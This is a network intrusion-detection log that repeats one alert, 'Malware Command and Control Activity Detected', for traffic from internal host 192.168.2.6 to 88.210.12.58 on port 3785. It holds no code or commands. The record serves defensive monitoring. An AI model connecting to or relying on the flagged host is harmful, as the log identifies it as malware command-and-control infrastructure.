2024-12-10T08:58:46.044663+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.145015+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.245004+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.345993+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.445985+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.547034+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.648011+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.747984+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.852698+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.952030+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.050697+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.152702+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.251003+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.551683+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.551683+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.551683+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.656715+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.752707+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.851996+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.953107+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:48.052998+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:48.154056+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:48.861957+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:48.861957+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.063379+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.163077+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.264707+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.364701+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.466714+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.566730+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.666717+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.766741+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.863979+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.965006+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.064998+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.166013+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.266032+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.365976+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.467018+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.568016+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.668997+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.770056+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.870983+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.972745+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.071979+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.172700+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.328865+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.328865+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.756709+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.756709+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.954009+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.054097+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.154990+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.255978+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.356015+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.455983+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.555993+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.656991+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.757995+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.862758+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.963180+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.060979+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.162867+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.263012+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.363995+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.464712+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.564988+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.666870+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.764988+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.864983+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.965010+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.066048+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.167097+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.268015+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.368139+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.468132+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.569002+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.670006+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.770006+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.871877+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.971642+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.072718+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.176566+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.274788+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.373991+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.474757+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.574975+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.674972+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.776708+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.876148+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.977042+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.299115+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.299115+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.546130+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.757984+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.858538+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.958749+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.057991+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.158794+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.258981+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.359038+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.463720+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.562825+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.662780+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.762796+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.862007+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.963021+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.064010+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.164098+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.264034+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.364997+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.466042+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.565973+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.667049+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.767199+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.090549+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.090549+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.296711+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.413955+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.517208+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.617072+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.717035+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.819761+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.918069+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.018996+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.119082+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.220022+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.320994+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.421016+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.521005+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.621001+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.721013+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.822085+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.924714+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.023993+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.124725+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.228721+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.328724+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.424985+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.525006+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.628710+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.728041+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.828715+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.931051+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.032103+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.133035+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.233024+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.334123+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.435102+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.535007+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.635007+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.735016+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.836060+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.936004+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.037029+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.136994+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.238013+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.339011+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.440004+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.544715+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.643365+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.744715+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.844729+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.958699+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.480142+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.480142+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.681015+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.782020+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.882005+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.984715+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.084719+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.183000+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.284719+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.384010+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.484726+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.585001+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.688631+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.786068+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.887016+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.988081+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.089053+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.189045+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.290071+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.389988+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.490015+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.591088+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.691080+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.792029+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.892992+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.993014+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.096722+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.195153+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.295993+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.396042+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.497008+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.597996+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.698987+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.798986+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.900006+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.000079+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.101047+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.201014+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.302015+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.401985+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.503010+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.604006+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.705588+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.268987+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.268987+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.470006+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.571054+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.674892+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.774944+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.874998+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.972022+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.073052+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.174121+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.274996+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.375007+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.475999+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.577004+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.677016+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.777995+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.878058+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.979018+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.082784+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.179999+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
